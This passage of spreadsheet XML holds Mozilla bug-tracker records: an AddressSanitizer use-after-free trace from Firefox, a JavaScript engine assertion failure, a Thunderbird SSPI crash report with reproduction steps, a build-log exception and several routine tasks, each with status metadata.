&gt;    #14 0x7f33ae9cdf86 in js::CrossCompartmentWrapper::call(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CallArgs const&amp;) js/src/jswrapper.cpp:465
&gt;    #15 0x7f33ae8b9a65 in js::Proxy::call(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CallArgs const&amp;) js/src/jsproxy.cpp:2637
&gt;    #16 0x7f33ae8bf5f4 in js::proxy_Call(JSContext*, unsigned int, JS::Value*) js/src/jsproxy.cpp:3040
&gt;    #17 0x7f33aeab6ab1 in CallJSNative js/src/jscntxtinlines.h:239
&gt;    #18 0x7f33aeab6ab1 in js::Invoke(JSContext*, JS::CallArgs, js::MaybeConstruct) js/src/vm/Interpreter.cpp:469
&gt;    #19 0x7f33aeaa95da in Interpret(JSContext*, js::RunState&amp;) js/src/vm/Interpreter.cpp:2614
&gt;    #20 0x7f33aea8db39 in js::RunScript(JSContext*, js::RunState&amp;) js/src/vm/Interpreter.cpp:423
&gt;    #21 0x7f33aeab6fff in js::Invoke(JSContext*, JS::CallArgs, js::MaybeConstruct) js/src/vm/Interpreter.cpp:495
&gt;    #22 0x7f33aeab80ae in js::Invoke(JSContext*, JS::Value const&amp;, JS::Value const&amp;, unsigned int, JS::Value const*, JS::MutableHandle&lt;JS::Value&gt;) js/src/vm/Interpreter.cpp:532
&gt;    #23 0x7f33ae897244 in js::DirectProxyHandler::call(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CallArgs const&amp;) js/src/jsproxy.cpp:465
&gt;    #24 0x7f33ae9cdf86 in js::CrossCompartmentWrapper::call(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CallArgs const&amp;) js/src/jswrapper.cpp:465
&gt;    #25 0x7f33ae8b9a65 in js::Proxy::call(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CallArgs const&amp;) js/src/jsproxy.cpp:2637
&gt;    #26 0x7f33ae8bf5f4 in js::proxy_Call(JSContext*, unsigned int, JS::Value*) js/src/jsproxy.cpp:3040
&gt;    #27 0x7f33aeab6ab1 in CallJSNative js/src/jscntxtinlines.h:239
&gt;    #28 0x7f33aeab6ab1 in js::Invoke(JSContext*, JS::CallArgs, js::MaybeConstruct) js/src/vm/Interpreter.cpp:469
&gt;    #29 0x7f33aeab80ae in js::Invoke(JSContext*, JS::Value const&amp;, JS::Value const&amp;, unsigned int, JS::Value const*, JS::MutableHandle&lt;JS::Value&gt;) js/src/vm/Interpreter.cpp:532
&gt;    #30 0x7f33ae2cc585 in js::jit::DoCallFallback(JSContext*, js::jit::BaselineFrame*, js::jit::ICCall_Fallback*, unsigned int, JS::Value*, JS::MutableHandle&lt;JS::Value&gt;) js/src/jit/BaselineIC.cpp:8235
&gt;
&gt;0x6160001fd678 is located 504 bytes inside of 528-byte region [0x6160001fd480,0x6160001fd690)
&gt;freed by thread T0 here:
&gt;    #0 0x473b81 in __interceptor_free _asan_rtl_
&gt;    #1 0x7f33a76eb73b in SnowWhiteKiller::~SnowWhiteKiller() xpcom/base/nsCycleCollector.cpp:2352
&gt;    #2 0x7f33a76eb339 in nsCycleCollector::FreeSnowWhite(bool) xpcom/base/nsCycleCollector.cpp:2516
&gt;    #3 0x7f33a76f1115 in nsCycleCollector::BeginCollection(ccType, nsICycleCollectorListener*) xpcom/base/nsCycleCollector.cpp:3392
&gt;    #4 0x7f33a76f07f6 in nsCycleCollector::Collect(ccType, js::SliceBudget&amp;, nsICycleCollectorListener*) xpcom/base/nsCycleCollector.cpp:3254
&gt;    #5 0x7f33a76f43a3 in nsCycleCollector_collect(nsICycleCollectorListener*) xpcom/base/nsCycleCollector.cpp:3807
&gt;    #6 0x7f33aa50ee96 in nsJSContext::CycleCollectNow(nsICycleCollectorListener*, int) dom/base/nsJSEnvironment.cpp:1949
&gt;    #7 0x7f33aa50e590 in nsJSEnvironmentObserver::Observe(nsISupports*, char const*, char16_t const*) dom/base/nsJSEnvironment.cpp:277
&gt;    #8 0x7f33a773664c in NotifyObservers xpcom/ds/nsObserverList.cpp:96
&gt;    #9 0x7f33a773664c in nsObserverService::NotifyObservers(nsISupports*, char const*, char16_t const*) xpcom/ds/nsObserverService.cpp:302
&gt;    #10 0x7f33a77e9921 in NS_InvokeByIndex xpcom/reflect/xptcall/src/md/unix/xptcinvoke_x86_64_unix.cpp:162
&gt;    #11 0x7f33aa24f1d7 in Invoke js/xpconnect/src/XPCWrappedNative.cpp:2407
&gt;    #12 0x7f33aa24f1d7 in CallMethodHelper js/xpconnect/src/XPCWrappedNative.cpp:1748
&gt;    #13 0x7f33aa24f1d7 in XPCWrappedNative::CallMethod(XPCCallContext&amp;, XPCWrappedNative::CallMode) js/xpconnect/src/XPCWrappedNative.cpp:1715
&gt;    #14 0x7f33aa25523e in XPC_WN_CallMethod(JSContext*, unsigned int, JS::Value*) js/xpconnect/src/XPCWrappedNativeJSOps.cpp:1282
&gt;    #15 0x7f33aeab6ab1 in CallJSNative js/src/jscntxtinlines.h:239
&gt;    #16 0x7f33aeab6ab1 in js::Invoke(JSContext*, JS::CallArgs, js::MaybeConstruct) js/src/vm/Interpreter.cpp:469
&gt;    #17 0x7f33aeaa95da in Interpret(JSContext*, js::RunState&amp;) js/src/vm/Interpreter.cpp:2614
&gt;    #18 0x7f33aea8db39 in js::RunScript(JSContext*, js::RunState&amp;) js/src/vm/Interpreter.cpp:423
&gt;    #19 0x7f33aeab6fff in js::Invoke(JSContext*, JS::CallArgs, js::MaybeConstruct) js/src/vm/Interpreter.cpp:495
&gt;    #20 0x7f33ae76f167 in js::CallOrConstructBoundFunction(JSContext*, unsigned int, JS::Value*) js/src/jsfun.cpp:1282
&gt;    #21 0x7f33aeab6ab1 in CallJSNative js/src/jscntxtinlines.h:239
&gt;    #22 0x7f33aeab6ab1 in js::Invoke(JSContext*, JS::CallArgs, js::MaybeConstruct) js/src/vm/Interpreter.cpp:469
&gt;    #23 0x7f33aeab80ae in js::Invoke(JSContext*, JS::Value const&amp;, JS::Value const&amp;, unsigned int, JS::Value const*, JS::MutableHandle&lt;JS::Value&gt;) js/src/vm/Interpreter.cpp:532
&gt;    #24 0x7f33ae897244 in js::DirectProxyHandler::call(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CallArgs const&amp;) js/src/jsproxy.cpp:465
&gt;    #25 0x7f33ae9cdf86 in js::CrossCompartmentWrapper::call(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CallArgs const&amp;) js/src/jswrapper.cpp:465
&gt;    #26 0x7f33ae8b9a65 in js::Proxy::call(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CallArgs const&amp;) js/src/jsproxy.cpp:2637
&gt;    #27 0x7f33ae8bf5f4 in js::proxy_Call(JSContext*, unsigned int, JS::Value*) js/src/jsproxy.cpp:3040
&gt;    #28 0x7f33aeab6ab1 in CallJSNative js/src/jscntxtinlines.h:239
&gt;    #29 0x7f33aeab6ab1 in js::Invoke(JSContext*, JS::CallArgs, js::MaybeConstruct) js/src/vm/Interpreter.cpp:469
&gt;    #30 0x7f33aeaa95da in Interpret(JSContext*, js::RunState&amp;) js/src/vm/Interpreter.cpp:2614
&gt;    #31 0x7f33aea8db39 in js::RunScript(JSContext*, js::RunState&amp;) js/src/vm/Interpreter.cpp:423
&gt;    #32 0x7f33aeab99eb in js::ExecuteKernel(JSContext*, JS::Handle&lt;JSScript*&gt;, JSObject&amp;, JS::Value const&amp;, js::ExecuteType, js::AbstractFramePtr, JS::Value*) js/src/vm/Interpreter.cpp:631
&gt;    #33 0x7f33aeab9f8e in js::Execute(JSContext*, JS::Handle&lt;JSScript*&gt;, JSObject&amp;, JS::Value*) js/src/vm/Interpreter.cpp:667
&gt;    #34 0x7f33ae71bc86 in JS::Evaluate(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::ReadOnlyCompileOptions const&amp;, char16_t const*, unsigned long, JS::Value*) js/src/jsapi.cpp:4779
&gt;    #35 0x7f33aa5e0a1a in nsJSUtils::EvaluateString(JSContext*, nsAString_internal const&amp;, JS::Handle&lt;JSObject*&gt;, JS::CompileOptions&amp;, nsJSUtils::EvaluateOptions&amp;, JS::Value*, void**) dom/base/nsJSUtils.cpp:223
&gt;
&gt;previously allocated by thread T0 here:
&gt;    #0 0x473d81 in malloc _asan_rtl_
&gt;    #1 0x7f33b1eb2a7d in moz_xmalloc memory/mozalloc/mozalloc.cpp:52
&gt;    #2 0x7f33ab216ce6 in operator new objdir-ff-asan/content/html/content/src/../../../../dist/include/mozilla/mozalloc.h:201
&gt;    #3 0x7f33ab216ce6 in NS_NewHTMLVideoElement(already_AddRefed&lt;nsINodeInfo&gt;&amp;&amp;, mozilla::dom::FromParser) content/html/content/src/HTMLVideoElement.cpp:37
&gt;    #4 0x7f33ab2998f7 in CreateHTMLElement content/html/document/src/nsHTMLContentSink.cpp:303
&gt;    #5 0x7f33ab2998f7 in NS_NewHTMLElement(mozilla::dom::Element**, already_AddRefed&lt;nsINodeInfo&gt;&amp;&amp;, mozilla::dom::FromParser) content/html/document/src/nsHTMLContentSink.cpp:284
&gt;    #6 0x7f33aaf1ba60 in NS_NewElement(mozilla::dom::Element**, already_AddRefed&lt;nsINodeInfo&gt;&amp;&amp;, mozilla::dom::FromParser) content/base/src/nsNameSpaceManager.cpp:146
&gt;    #7 0x7f33aa3f2dc0 in nsHtml5TreeOperation::CreateElement(int, nsIAtom*, nsHtml5HtmlAttributes*, mozilla::dom::FromParser, nsHtml5DocumentBuilder*) parser/html/nsHtml5TreeOperation.cpp:359
&gt;    #8 0x7f33aa3ffadf in nsHtml5TreeOperation::Perform(nsHtml5TreeOpExecutor*, nsIContent**) parser/html/nsHtml5TreeOperation.cpp:685
&gt;    #9 0x7f33aa3fac19 in nsHtml5TreeOpExecutor::RunFlushLoop() parser/html/nsHtml5TreeOpExecutor.cpp:439
&gt;    #10 0x7f33aa40824b in nsHtml5ExecutorFlusher::Run() parser/html/nsHtml5StreamParser.cpp:128
&gt;    #11 0x7f33a77d64e0 in nsThread::ProcessNextEvent(bool, bool*) xpcom/threads/nsThread.cpp:694
&gt;    #12 0x7f33a76a1d5a in NS_ProcessNextEvent(nsIThread*, bool) xpcom/glue/nsThreadUtils.cpp:263
&gt;    #13 0x7f33a7f99159 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) ipc/glue/MessagePump.cpp:95
&gt;    #14 0x7f33a7f42130 in RunInternal ipc/chromium/src/base/message_loop.cc:226
&gt;    #15 0x7f33a7f42130 in RunHandler ipc/chromium/src/base/message_loop.cc:219
&gt;    #16 0x7f33a7f42130 in MessageLoop::Run() ipc/chromium/src/base/message_loop.cc:193
&gt;    #17 0x7f33aa0af447 in nsBaseAppShell::Run() widget/xpwidgets/nsBaseAppShell.cpp:164
&gt;    #18 0x7f33acec5cb8 in nsAppStartup::Run() toolkit/components/startup/nsAppStartup.cpp:276
&gt;    #19 0x7f33acd351a3 in XREMain::XRE_mainRun() toolkit/xre/nsAppRunner.cpp:4019
&gt;    #20 0x7f33acd3608d in XREMain::XRE_main(int, char**, nsXREAppData const*) toolkit/xre/nsAppRunner.cpp:4088
&gt;    #21 0x7f33acd36edd in XRE_main toolkit/xre/nsAppRunner.cpp:4300
&gt;    #22 0x48c6e7 in do_main browser/app/nsBrowserApp.cpp:282
&gt;    #23 0x48c6e7 in main browser/app/nsBrowserApp.cpp:643
&gt;    #24 0x7f33b5d3b76c in __libc_start_main /build/buildd/eglibc-2.15/csu/libc-start.c:226
&gt;
&gt;SUMMARY: AddressSanitizer: heap-use-after-free ??:0 ??
&gt;Shadow bytes around the buggy address:
&gt;  0x0c2c80037a70: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
&gt;  0x0c2c80037a80: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
&gt;  0x0c2c80037a90: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
&gt;  0x0c2c80037aa0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
&gt;  0x0c2c80037ab0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
&gt;=&gt;0x0c2c80037ac0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd[fd]
&gt;  0x0c2c80037ad0: fd fd fa fa fa fa fa fa fa fa fa fa fa fa fa fa
&gt;  0x0c2c80037ae0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
&gt;  0x0c2c80037af0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
&gt;  0x0c2c80037b00: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
&gt;  0x0c2c80037b10: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
&gt;Shadow byte legend (one shadow byte represents 8 application bytes):
&gt;  Addressable:           00
&gt;  Partially addressable: 01 02 03 04 05 06 07
&gt;  Heap left redzone:       fa
&gt;  Heap right redzone:      fb
&gt;  Freed heap region:       fd
&gt;  Stack left redzone:      f1
&gt;  Stack mid redzone:       f2
&gt;  Stack right redzone:     f3
&gt;  Stack partial redzone:   f4
&gt;  Stack after return:      f5
&gt;  Stack use after scope:   f8
&gt;  Global redzone:          f9
&gt;  Global init order:       f6
&gt;  Poisoned by user:        f7
&gt;  Contiguous container OOB:fc
&gt;  ASan internal:           fe
&gt;==22711==ABORTING
&gt;
&gt;</t>
        </is>
      </c>
      <c r="X4226" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4227">
      <c r="A4227" t="n">
        <v>1018916</v>
      </c>
      <c r="B4227" t="inlineStr">
        <is>
          <t>2014-06-02 04:09:42 -0700</t>
        </is>
      </c>
      <c r="C4227" t="inlineStr">
        <is>
          <t>Assertion failure: IsObjectValueInCompartment(value, compartment())</t>
        </is>
      </c>
      <c r="D4227" t="inlineStr">
        <is>
          <t>2016-06-04 16:01:32 -0700</t>
        </is>
      </c>
      <c r="E4227" t="n">
        <v>1</v>
      </c>
      <c r="F4227" t="n">
        <v>1</v>
      </c>
      <c r="G4227" t="n">
        <v>3</v>
      </c>
      <c r="H4227" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4227" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4227" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K4227" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4227" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M4227" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4227" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4227" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4227" t="inlineStr">
        <is>
          <t>[adv-main33+]</t>
        </is>
      </c>
      <c r="Q4227" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4227" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4227" t="inlineStr">
        <is>
          <t>mozilla33</t>
        </is>
      </c>
      <c r="T4227" t="n">
        <v>1</v>
      </c>
      <c r="U4227" t="n">
        <v>0</v>
      </c>
      <c r="V4227" t="n">
        <v>13</v>
      </c>
      <c r="W4227" t="inlineStr">
        <is>
          <t>Created attachment 8432435
bughunter stack
found via bughunter on http://www.sherwin-williams.com/store-locator/
loading this site / or reloading cause
Assertion failure: IsObjectValueInCompartment(value, compartment()), at c:\work\mozilla\builds\nightly\mozilla\js\src\vm/ObjectImpl.h:731</t>
        </is>
      </c>
      <c r="X4227" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4228">
      <c r="A4228" t="n">
        <v>1065650</v>
      </c>
      <c r="B4228" t="inlineStr">
        <is>
          <t>2014-09-10 14:20:17 -0700</t>
        </is>
      </c>
      <c r="C4228" t="inlineStr">
        <is>
          <t>"This field is required" error trying to create a new job exclusion, even though all fields are filled</t>
        </is>
      </c>
      <c r="D4228" t="inlineStr">
        <is>
          <t>2015-05-20 04:27:05 -0700</t>
        </is>
      </c>
      <c r="E4228" t="n">
        <v>1</v>
      </c>
      <c r="F4228" t="n">
        <v>1</v>
      </c>
      <c r="G4228" t="n">
        <v>7</v>
      </c>
      <c r="H4228" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I4228" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J4228" t="inlineStr">
        <is>
          <t>Treeherder</t>
        </is>
      </c>
      <c r="K4228" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L4228" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4228" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4228" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4228" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4228" t="inlineStr"/>
      <c r="Q4228" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R4228" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4228" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4228" t="n">
        <v>1</v>
      </c>
      <c r="U4228" t="n">
        <v>0</v>
      </c>
      <c r="V4228" t="n">
        <v>5</v>
      </c>
      <c r="W4228" t="inlineStr">
        <is>
          <t>Created attachment 8487493
screenshot
I'm trying to create a new job exclusion profile per the attached screenshot, but am getting a "This field is required" error when I hit save without any indication of what's missing.</t>
        </is>
      </c>
      <c r="X4228" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4229">
      <c r="A4229" t="n">
        <v>511806</v>
      </c>
      <c r="B4229" t="inlineStr">
        <is>
          <t>2009-08-20 19:01:20 -0700</t>
        </is>
      </c>
      <c r="C4229" t="inlineStr">
        <is>
          <t>Crash when using SSPI and joined to AD under Vista or later [@ strcat - nsImapFlagAndUidState::AddUidCustomFlagPair]</t>
        </is>
      </c>
      <c r="D4229" t="inlineStr">
        <is>
          <t>2011-06-13 10:01:48 -0700</t>
        </is>
      </c>
      <c r="E4229" t="n">
        <v>1</v>
      </c>
      <c r="F4229" t="n">
        <v>1</v>
      </c>
      <c r="G4229" t="n">
        <v>3</v>
      </c>
      <c r="H4229" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4229" t="inlineStr">
        <is>
          <t>MailNews Core</t>
        </is>
      </c>
      <c r="J4229" t="inlineStr">
        <is>
          <t>Networking: IMAP</t>
        </is>
      </c>
      <c r="K4229" t="inlineStr">
        <is>
          <t>1.9.1 Branch</t>
        </is>
      </c>
      <c r="L4229" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M4229" t="inlineStr">
        <is>
          <t>Windows Vista</t>
        </is>
      </c>
      <c r="N4229" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4229" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4229" t="inlineStr">
        <is>
          <t>[sg:critical][no l10n impact][needs 1.9.0 landing]</t>
        </is>
      </c>
      <c r="Q4229" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4229" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4229" t="inlineStr">
        <is>
          <t>Thunderbird 3.0b4</t>
        </is>
      </c>
      <c r="T4229" t="n">
        <v>1</v>
      </c>
      <c r="U4229" t="n">
        <v>0</v>
      </c>
      <c r="V4229" t="n">
        <v>66</v>
      </c>
      <c r="W4229" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.2) Gecko/20090803 Fedora/3.5.2-2.fc11 Firefox/3.5.2
Build Identifier: 3.0b3 / 20090715140311
The UC Berkeley central email system recently enabled GSSAPI support for SMTP, IMAP, and POP.  Thunderbird 2.0.0.22 on Windows XP when joined to AD works fine; however, under Vista or Windows 7 (and joined to AD), Thunderbird crashes when attempting to use SSPI.  Thunderbird 2, by default, will always attempt to use SSPI during SMTP, and we've received widespread reports across campus of Thunderbird crashing when attempting to send email.  Setting network.auth-use-sspi to false returns Thunderbird to a stable state.
We have been unable to get Talkback data for Thunderbird 2, so we've replicated the problem with Thunderbird 3.0b3 and Breakpad, which appears to also crash under SSPI.
This bug may be a duplicate of bug 505971.  However, since this behaviour is widespread in our environment, and Thunderbird immediately crashes with SMTP or IMAP when joined to AD on Vista or later and SSPI is enabled it seems worthwhile to file a separate bug report.
Reproducible: Always
Steps to Reproduce:
1. Join Windows Vista (or later) machine to CAMPUS.BERKELEY.EDU AD
2. Configure Thunderbird client to use calmail.berkeley.edu (which will advertise AUTH=GSSAPI for SSL/TLS connections).
3. Attempt to send email with Thunderbird 2 (or under Thunderbird 3, check "Use secure authentication" for SMTP setup) or retrieve email with "Use secure authentication" checked for IMAP/POP
Actual Results:  
Thunderbird crashes.
Expected Results:  
Thunderbird performs GSSAPI SASL negotiation and sends email or retrieves email.
http://crash-stats.mozilla.com/report/index/40d6d04c-6423-47b1-898d-6a8a62090820 is a crash of 3.0b3 under Vista using SSPI to login to IMAP.</t>
        </is>
      </c>
      <c r="X4229" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4230">
      <c r="A4230" t="n">
        <v>1462323</v>
      </c>
      <c r="B4230" t="inlineStr">
        <is>
          <t>2018-05-17 05:29:15 -0700</t>
        </is>
      </c>
      <c r="C4230" t="inlineStr">
        <is>
          <t>Intermittent Exception: Could not find any candidate pushheads in the last 50 revisions.</t>
        </is>
      </c>
      <c r="D4230" t="inlineStr">
        <is>
          <t>2019-04-18 02:57:16 -0700</t>
        </is>
      </c>
      <c r="E4230" t="n">
        <v>1</v>
      </c>
      <c r="F4230" t="n">
        <v>1</v>
      </c>
      <c r="G4230" t="n">
        <v>5</v>
      </c>
      <c r="H4230" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I4230" t="inlineStr">
        <is>
          <t>Developer Services</t>
        </is>
      </c>
      <c r="J4230" t="inlineStr">
        <is>
          <t>Mercurial: hg.mozilla.org</t>
        </is>
      </c>
      <c r="K4230" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4230" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4230" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4230" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4230" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4230" t="inlineStr">
        <is>
          <t>[stockwell disable-recommended]</t>
        </is>
      </c>
      <c r="Q4230" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R4230" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4230" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4230" t="n">
        <v>1</v>
      </c>
      <c r="U4230" t="n">
        <v>0</v>
      </c>
      <c r="V4230" t="n">
        <v>48</v>
      </c>
      <c r="W4230" t="inlineStr">
        <is>
          <t>Filed by: nbeleuzu [at] mozilla.com
https://treeherder.mozilla.org/logviewer.html#?job_id=178963580&amp;repo=mozilla-inbound
https://queue.taskcluster.net/v1/task/BxHpemi3SI26PQUNtJZjGg/runs/0/artifacts/public/logs/live_backing.log
Fail started on a backout from inbound
https://hg.mozilla.org/integration/mozilla-inbound/rev/786865568ed76134a3f9724956949e5d48f34210
[task 2018-05-17T12:20:14.836Z] 12:20:14     INFO -  Ignoring exception unpickling cache file /builds/worker/.mozbuild/package-frontend/artifact_url-cache.pickle: IOError(2, 'No such file or directory')
[task 2018-05-17T12:20:14.836Z] 12:20:14     INFO -  hg suggested 500 candidate revisions
[task 2018-05-17T12:20:14.836Z] 12:20:14     INFO -  Ignoring exception unpickling cache file /builds/worker/.mozbuild/package-frontend/pushhead_cache-cache.pickle: IOError(2, 'No such file or directory')
[task 2018-05-17T12:20:14.836Z] 12:20:14     INFO -  Attempting to find a pushhead containing 786865568ed76134a3f9724956949e5d48f34210 on mozilla-central.
[task 2018-05-17T12:20:14.837Z] 12:20:14     INFO -  Attempting to find a pushhead containing 786865568ed76134a3f9724956949e5d48f34210 on integration/mozilla-inbound.
[task 2018-05-17T12:20:14.837Z] 12:20:14     INFO -  Attempting to find a pushhead containing 786865568ed76134a3f9724956949e5d48f34210 on releases/mozilla-beta.
[task 2018-05-17T12:20:14.837Z] 12:20:14     INFO -  Attempting to find a pushhead containing 786865568ed76134a3f9724956949e5d48f34210 on integration/autoland.
[task 2018-05-17T12:20:14.837Z] 12:20:14     INFO -  Error running mach:
[task 2018-05-17T12:20:14.837Z] 12:20:14     INFO -      ['--log-no-times', 'artifact', 'install']
[task 2018-05-17T12:20:14.838Z] 12:20:14     INFO -  The error occurred in code that was called by the mach command. This is either
[task 2018-05-17T12:20:14.838Z] 12:20:14     INFO -  a bug in the called code itself or in the way that mach is calling it.
[task 2018-05-17T12:20:14.838Z] 12:20:14     INFO -  You should consider filing a bug for this issue.
[task 2018-05-17T12:20:14.838Z] 12:20:14     INFO -  If filing a bug, please include the full output of mach, including this error
[task 2018-05-17T12:20:14.838Z] 12:20:14     INFO -  message.
[task 2018-05-17T12:20:14.838Z] 12:20:14     INFO -  The details of the failure are as follows:
[task 2018-05-17T12:20:14.838Z] 12:20:14     INFO -  Exception: Could not find any candidate pushheads in the last 50 revisions.
[task 2018-05-17T12:20:14.838Z] 12:20:14     INFO -  Search started with 786865568ed76134a3f9724956949e5d48f34210, which must be known to Mozilla automation.
[task 2018-05-17T12:20:14.838Z] 12:20:14     INFO -  see https://developer.mozilla.org/en-US/docs/Artifact_builds</t>
        </is>
      </c>
      <c r="X4230" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4231">
      <c r="A4231" t="n">
        <v>1356488</v>
      </c>
      <c r="B4231" t="inlineStr">
        <is>
          <t>2017-04-13 21:22:49 -0700</t>
        </is>
      </c>
      <c r="C4231" t="inlineStr">
        <is>
          <t>[User Story] [Overlay] [Tour Experiment] As a user, I want to learn how to make Firefox my "Default Browser"</t>
        </is>
      </c>
      <c r="D4231" t="inlineStr">
        <is>
          <t>2017-08-11 12:19:53 -0700</t>
        </is>
      </c>
      <c r="E4231" t="n">
        <v>1</v>
      </c>
      <c r="F4231" t="n">
        <v>1</v>
      </c>
      <c r="G4231" t="n">
        <v>2</v>
      </c>
      <c r="H4231" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I4231" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J4231" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K4231" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4231" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4231" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4231" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4231" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4231" t="inlineStr">
        <is>
          <t>[photon-onboarding] [User Story]</t>
        </is>
      </c>
      <c r="Q4231" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4231" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4231" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4231" t="n">
        <v>1</v>
      </c>
      <c r="U4231" t="n">
        <v>0</v>
      </c>
      <c r="V4231" t="n">
        <v>2</v>
      </c>
      <c r="W4231" t="inlineStr">
        <is>
          <t>[User Story]
As a user, I want to learn how to make Firefox my default browser
[Acceptance Criteria]
- I can see the details of "Default Browser" by moving my mouse over (need to confirm with @mverdi on mouseover vs click)
- I can set Firefox as my default browser from here
- When Firefox is already my default browser, it will show this tour is completed 
- When Firefox is already my default browser, "Default Browser" notification will not appear</t>
        </is>
      </c>
      <c r="X4231" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4232">
      <c r="A4232" t="n">
        <v>1162696</v>
      </c>
      <c r="B4232" t="inlineStr">
        <is>
          <t>2015-05-07 12:57:02 -0700</t>
        </is>
      </c>
      <c r="C4232" t="inlineStr">
        <is>
          <t>Use hgtool for automated reconfigs</t>
        </is>
      </c>
      <c r="D4232" t="inlineStr">
        <is>
          <t>2017-05-08 09:48:46 -0700</t>
        </is>
      </c>
      <c r="E4232" t="n">
        <v>1</v>
      </c>
      <c r="F4232" t="n">
        <v>1</v>
      </c>
      <c r="G4232" t="n">
        <v>5</v>
      </c>
      <c r="H4232" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I4232" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J4232" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K4232" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4232" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4232" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4232" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4232" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4232" t="inlineStr"/>
      <c r="Q4232" t="inlineStr">
        <is>
